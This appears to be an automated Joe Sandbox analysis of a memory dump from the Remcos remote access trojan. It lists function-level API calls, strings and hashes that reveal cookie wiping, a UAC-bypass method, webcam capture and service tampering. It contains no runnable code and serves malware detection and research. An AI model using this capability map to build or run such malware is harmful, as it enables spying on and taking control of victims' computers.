                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                              • API String ID: 1133728706-4073444585
                                                              • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                              • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                              • Opcode Fuzzy Hash: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                              • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                              • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                              • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                              • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                              APIs
                                                                • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                              • _free.LIBCMT ref: 00450FC8
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 00450FD3
                                                              • _free.LIBCMT ref: 00450FDE
                                                              • _free.LIBCMT ref: 00451032
                                                              • _free.LIBCMT ref: 0045103D
                                                              • _free.LIBCMT ref: 00451048
                                                              • _free.LIBCMT ref: 00451053
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                              • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                              • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                              • int.LIBCPMT ref: 004111BE
                                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                              • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                              • String ID: (mG
                                                              • API String ID: 2536120697-4059303827
                                                              • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                              • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                              • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                              • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                              APIs
                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                              • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              • API String ID: 1866151309-2070987746
                                                              • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                              • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                              • Opcode Fuzzy Hash: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                              • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                              • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                              • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                              • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                              • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                              APIs
                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe), ref: 0040760B
                                                                • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                              • CoUninitialize.OLE32 ref: 00407664
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                              • String ID: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                              • API String ID: 3851391207-2455460064
                                                              • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                              • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                              • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                              • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                              • GetLastError.KERNEL32 ref: 0040BB22
                                                              Strings
                                                              • UserProfile, xrefs: 0040BAE8
                                                              • [Chrome Cookies not found], xrefs: 0040BB3C
                                                              • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                              • API String ID: 2018770650-304995407
                                                              • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                              • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                              • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                              • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                              APIs
                                                              • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: Console$AllocOutputShowWindow
                                                              • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                              • API String ID: 2425139147-2212855755
                                                              • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                              • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                              • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                              • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                              • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$PkGNG$mscoree.dll
                                                              • API String ID: 4061214504-213444651
                                                              • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                              • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                              • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                              • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                              APIs
                                                              • __allrem.LIBCMT ref: 0043ACE9
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                              • __allrem.LIBCMT ref: 0043AD1C
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                              • __allrem.LIBCMT ref: 0043AD51
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                              • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                              • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                              • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: H_prologSleep
                                                              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                              • API String ID: 3469354165-3054508432
                                                              • Opcode ID: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                                              • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                              • Opcode Fuzzy Hash: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                                              • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                              APIs
                                                                • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                              • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                                                • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                                                • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                                • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                              • String ID:
                                                              • API String ID: 3950776272-0
                                                              • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                              • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                              • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                              • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: __cftoe
                                                              • String ID:
                                                              • API String ID: 4189289331-0
                                                              • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                              • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                              • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                              • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                              • String ID:
                                                              • API String ID: 493672254-0
                                                              • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                              • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                              • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                              • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID: PkGNG
                                                              • API String ID: 1036877536-263838557
                                                              • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                              • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                              • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                              • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                              APIs
                                                              • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                              • _free.LIBCMT ref: 004482CC
                                                              • _free.LIBCMT ref: 004482F4
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                              • _abort.LIBCMT ref: 00448313
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                              • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                              • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                              • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                              • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                              • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                              • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                              • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                              • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                              • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                              • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                              • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                              • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PkGNG
                                                              • API String ID: 0-263838557
                                                              • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                              • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                              • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                              • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                              • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                                              • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                              • String ID: PkGNG
                                                              • API String ID: 3360349984-263838557
                                                              • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                              • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                              • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
